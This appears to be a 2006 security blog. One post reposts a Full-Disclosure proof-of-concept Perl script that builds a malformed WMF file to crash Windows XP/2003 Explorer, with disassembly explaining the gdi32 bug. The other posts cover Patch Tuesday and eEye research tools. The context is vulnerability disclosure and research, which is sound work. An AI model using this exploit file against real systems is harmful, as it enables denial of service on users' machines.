First off... you'll notice I put exploit in quotes... I haven't investigated this yet.... That's my plan for this evening... It's a crash which means a DoS.... whether you consider that an exploit or not is up to you...
Here's the original posting from FD
quote:
Posted by: cyanid-E
Description:
yet another 'windows meta file' (WMF) denial of service exploit.
System affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003
Tech info:
page fault in gdi32!CreateBrushIndirect() because of an invalid pointer access.
Incorrect (short) to (void*) sign extension also present.
Exploit:
=== begin of brush.pl ===
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by cyanid-E ";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
# 18-byte WMF header: mtType=1, mtHeaderSize=9 words, mtVersion=0x300,
# mtSize=0x22 words (68 bytes); the remaining header fields hold "cyanid-E"
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
# last two header bytes ("-E"), then record 1: 7 words, 0x02FC
# CreateBrushIndirect with an all-zero LOGBRUSH
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
# record 2: 8 words, 0x02FA CreatePenIndirect with an all-zero LOGPEN
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# record 3: 7 words, CreateBrushIndirect with lbStyle=8 (BS_DIBPATTERN8X8),
# COLORREF 0 and lbHatch=0x8000; the 3-word META_EOF record starts after it
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait \n";
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).
Discovered:
06/24/2006; vendor informed but not answered
Further information from FD:
quote:
1. 'Bad' wmf record:
07 00 00 00
length of record (in words)
FC 02
type (CreateBrushIndirect)
08 00 00 00 00 00 00 80
'packed' (good old Win16 days) LOGBRUSH data:
08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)
2. Sign extension bug:
_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; < -- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
......
3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
......
mov eax, [ebx] ; < -- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)
I'll keep people informed as I play with it...
Peace,
HT
This Tuesday is the second Tuesday of the month, and like every other month that means it's time again for Patch Tuesday.
This time it looks bad... 12 Updates, 10 for Windows and 2 for Office... lately the turn around for PoCs and working exploits going public seems to be less than two weeks... HD Moore was 9 days on RASMAN, a couple had detailed enough explanations in the advisories that "discoverers" put out last time that working exploits could have easily been written... This is a large number of updates for one time.... More updates means a better chance of missing one or something messin' up. When you consider that from Jan - July we had only 39 updates in total.... we're now adding 12 more.. That's 23.5% of all updates released up to and including this August release... 8 months of updates and nearly 1/4 of them are coming out in a single month...
I'm going to put in some time this weekend catching up on the mailing lists see if I missed anything that could be assumed to lead to a Patch Tuesday update.... I'll post anything I find..
Here's the MS Advance Notice Bulletin
quote:
Summary
=======
On 8 August 2006 Microsoft is planning to release: Security Updates. Ten Microsoft Security Bulletins affecting Microsoft Windows.
The highest Maximum Severity rating for these is Critical. These
updates will be detectable using the Microsoft Baseline Security
Analyzer and the Enterprise Scan Tool. Some of these updates will
require a restart.
. Two Microsoft Security Bulletins affecting Microsoft Office.
The highest Maximum Severity rating for these is Critical. These
updates will be detectable using the Microsoft Baseline Security
Analyzer. These updates may require a restart.
Microsoft Windows Malicious Software Removal Tool
. Microsoft will release an updated version of the Microsoft
Windows Malicious Software Removal Tool on Windows Update, Microsoft
Update, Windows Server Update Services and the Download Center.
Note that this tool will NOT be distributed using Software Update
Services (SUS).
Non-security High Priority updates on MU, WU, WSUS and SUS
. Microsoft will not release any NON-SECURITY High-Priority
Updates for Windows on Windows Update (WU) and Software Update
Services (SUS).
. Microsoft will release two NON-SECURITY High-Priority Updates
on Microsoft Update (MU) and Windows Server Update Services (WSUS).
Although we do not anticipate any changes, the number of bulletins,
products affected, restart information and severities are subject to
change until released.
Peace,
HT
This just came across bugtraq and vuln-dev and it's definitely cool. eEye has created a new research site showcasing their advisories and many of their tools (some of which were previously internal only).
I'm really looking forward to playing with the Binary Diffing Suite.
The eEye Binary Diffing Suite (EBDS) is a free and open source set of utilities for performing automated binary differential analysis. This becomes very useful for reverse engineering patches as well as program updates.
SysRQ2 is also looking pretty neat.
SysRq is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup.
The last one I plan on checking out rather quickly is Faultmon.
Faultmon is a simple command-line utility that monitors exceptions within a process. Whereas a conventional debugger will display an alert and freeze execution when an exception occurs, Faultmon writes basic contextual information to stdout and allows execution to continue automatically (although it can be made to pause as well).
Check out the site @ http://research.eeye.com/.
Peace,
HT